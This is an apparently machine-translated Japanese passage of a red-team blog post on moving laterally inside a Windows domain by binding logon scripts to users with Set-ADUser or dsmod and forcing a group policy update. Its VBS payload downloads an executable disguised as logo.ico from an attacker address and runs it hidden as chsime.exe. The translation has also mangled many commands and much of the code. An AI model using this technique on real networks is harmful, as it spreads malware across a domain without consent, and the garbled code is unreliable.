.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
0x1。利用シナリオ
ドメイン制御許可またはドメイン管理者およびその他の高権限を取得する場合、ドメインのPCホストに水平に移動する場合、相手はファイアウォールを開き、445および135で水平に使用できません。ログインスクリプト拘束方法を介してターゲットホストの権限を取得できます。
0x2。利用方法
方法1:PowerShell Win2012以上が伴い、現在のドメインユーザー情報を取得する
get -aduser -filter * -properties * | lastlogondateをソート|名前、メール、distinguedname、lastlogondate |を選択しますExport -CSV -Path C: \ users \ public \ documents \ user.csv -Encoding utf8
指定されたユーザーをバインドします
set -aduser -identity zhangsan -scriptpath 'download.vbs'
バインド
set -aduser -identity zhangsan -scriptpath ''
方法2:バインディングにはDSMODを使用します
dsmod user -loscr'download.vbs''cn=john、cn=users、dc=redteam、dc=com '
バインド
dsmod user -loscr '' 'cn=john、cn=users、dc=redteam、dc=com'
グループポリシーを更新します
シェルgpupdate /force
VBSコンテンツ
strfileurl='http://192.168.172.129:82/logo.ico'strhdlocation=' c: \ uses \ public \ documents \ chsime.exe'set objxmlhttp=create object( 'msxml2.xmlhttp')objxmlhttp.open'get '、strfileurl、falseobjxmlhttp.send()if objxmlhttp.status=200thenset objadosteam=create object(' adodb.stream.openobjadtream.penttream.peentream. 'adtypebinaryobjadostream.write objxmlhttp.responsebodyobjadostream.position=0'Stremset objfso=createObject(' scripting.filesemobject ')if objfso.fileeexists(strhdlocation)の場合、Stripting.filesextystemobject') Nothingobjadostream.savetofile strhdlocationobjadostream.closeset objadostream=noteendifset objxmlhttp=nothingstrcomputer='。' setws=wscript.createObject.createObject( 'wscript.shell')val=ws.run ( 'c: \ uses \ public \ documents \ chsime.exe'、0)
ディレクトリDC C: \ Windows \ sysvol \ sysvol \ redteam.com \ scripts \にアップロードし、1つまたは2つの方法でバインドし、グループポリシーを更新します。
https://www.cnblogs.com/websecyw/p/16657762.html